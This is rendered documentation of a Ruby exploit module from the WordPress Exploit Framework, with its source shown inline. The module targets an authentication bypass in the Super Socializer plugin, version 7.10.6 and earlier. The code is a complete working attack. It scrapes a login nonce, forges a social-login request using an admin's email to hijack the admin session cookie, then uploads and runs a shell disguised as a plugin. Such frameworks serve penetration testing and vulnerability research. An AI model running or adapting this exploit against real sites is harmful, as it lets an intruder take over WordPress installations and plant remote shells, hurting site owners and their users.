class Wpxf::Exploit::SuperSocializerShellUpload
Attributes
login_nonce[RW]
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/exploit/shell/super_socializer_shell_upload.rb, line 9 def initialize super update_info( name: 'Super Socializer <= 7.10.6 Authentication Bypass', desc: %( Super Socializer <= 7.10.6 is vulnerable to an authentication bypass exploit if an attacker is in posession of an admin's e-mail address and the social login feature is enabled. This module will acquire an admin session by utilising the aforementioned vulnerability and upload a shell packaged as a WordPress plugin. ), author: [ 'rastating' # WPXF module ], references: [ ['WPVDB', '9043'] ], date: 'Mar 03 2018' ) register_options([ StringOption.new( name: 'admin_email', desc: 'The e-mail address of the admin user to authenticate as', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/super_socializer_shell_upload.rb, line 42 def check check_plugin_version_from_readme('super-socializer', '7.10.7') end
fetch_nonce()
click to toggle source
# File lib/wpxf/modules/exploit/shell/super_socializer_shell_upload.rb, line 46 def fetch_nonce emit_info 'Fetching a login nonce...' res = execute_get_request(url: wordpress_url_login) return false unless res&.code == 200 pattern = /var\sthe_champ_sl_ajax_token\s=\s{"ajax_url":".+?","security":"([a-z0-9]+?)"};/i self.login_nonce = res.body[pattern, 1] if login_nonce.nil? emit_error 'Failed to fetch a login nonce' return false else emit_success "Found nonce: #{login_nonce}", true return true end end
login()
click to toggle source
# File lib/wpxf/modules/exploit/shell/super_socializer_shell_upload.rb, line 63 def login res = execute_post_request( url: wordpress_url_admin_ajax, body: { 'action' => 'the_champ_user_auth', 'security' => login_nonce, 'profileData[id]' => Wpxf::Utility::Text.rand_alpha(6), 'profileData[link]' => Wpxf::Utility::Text.rand_alpha(6), 'profileData[name]' => Wpxf::Utility::Text.rand_alpha(6), 'profileData[email]' => datastore['admin_email'], 'profileData[first_name]' => Wpxf::Utility::Text.rand_alpha(6), 'profileData[last_name]' => Wpxf::Utility::Text.rand_alpha(6), 'provider' => 'facebook', 'redirectionUrl' => full_uri } ) return false unless res&.cookies if valid_wordpress_cookie?(res.cookies.to_s) self.session_cookie = res.cookies.to_s return res.cookies else emit_error 'Failed to authenticate' return false end end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/super_socializer_shell_upload.rb, line 91 def run return false unless super return false unless fetch_nonce emit_info "Authenticating as #{datastore['admin_email']}..." return false unless login emit_info 'Uploading payload...' res = upload_payload_as_plugin_and_execute( Utility::Text.rand_alpha(10), Utility::Text.rand_alpha(10), session_cookie ) !res.nil? end